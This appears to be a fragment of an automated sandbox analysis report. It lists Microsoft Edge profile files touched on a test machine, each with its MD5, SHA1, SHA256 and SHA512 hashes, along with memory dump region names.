C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 790049b6cabe6d95399be487df0d0de6
SHA1 c4a39110d0b5b823839419378ddc6f6819c8893d
SHA256 928e4393e5f90eae9f0e5bec4865459c4a895a96b43390ed79d2eecacb493501
SHA512 4c3de667eae6fdb6c10cefd431353a65c80d7a47266a2ffa6f9be6b186a16fa3ae9258b3974fed3810403f59a4e0036868f6f2f60456970d46a49ea3add8737e

memory/3620-692-0x00007FF6255A0000-0x00007FF625906000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 70f69a71c63d7df5c328363014f26c96
SHA1 2ad9bb3c127e87186c6714435888639f12bf0cc5
SHA256 664a027b2f676f1cf59f9c8221dd0993afa632ed31fa051541d87f5d37bf5fa7
SHA512 18395f9a1cb1b19118f614189ead0e29e6bc2d0dd2a92c2583d9eea6ea4814cd07e1725b5776bfd3d45bf1a23c69c091ee78e0e9e300c66198563100b936e8df

memory/752-734-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5584-735-0x0000000000400000-0x0000000000636000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 7bdcdb7daca381acb8ec29f4c741e524
SHA1 7782c01f4e695c657fde8d5500a1b76747d4b1d9
SHA256 4a4cad7e1c83e41dd4f82c82422457ae8c45e7ea3446b232a21fc21209c7d806
SHA512 40b06e7e7238f3cf5ac8527db5feacbb604afc8347b682dbd813cd260114dcbe71205981299c13faf41dc62f22d01ac322998db30f3c08ef0618bfb4c9d1d645

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 d9ad0ba1ff90ce78a5be289d9d9f1f11
SHA1 f1449633c8510625b15422c537ee26b7fd73277e
SHA256 98cfdfc819da251e58095fc44f0a84d9a731f5d69f70b357c1ebd516293bc011
SHA512 0a0e171d3b016b4a662ec7b7aea3a545b5fc188de9ebaa06131af645657c79d58a8291d830f8f70b0487a092091031709a7a14511619ed4841a9ee144bf34ee9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 51fc25e26185d02864ba239dc0f07018
SHA1 125095b46a292f8d74499b5c7c260d6c859a2c41
SHA256 498ee10124918b10e65d2458195372ce7e36bf36ca1ae06ffc0c5f7fa1473bf6
SHA512 698b7726d2c431dcaab984fb49dcd787483761ee7105b1d7a8e5db0fc9fb05aa5b707ac966119b222d56fa3a8b764222dca38aeb25734d331bb1b955fbb010d6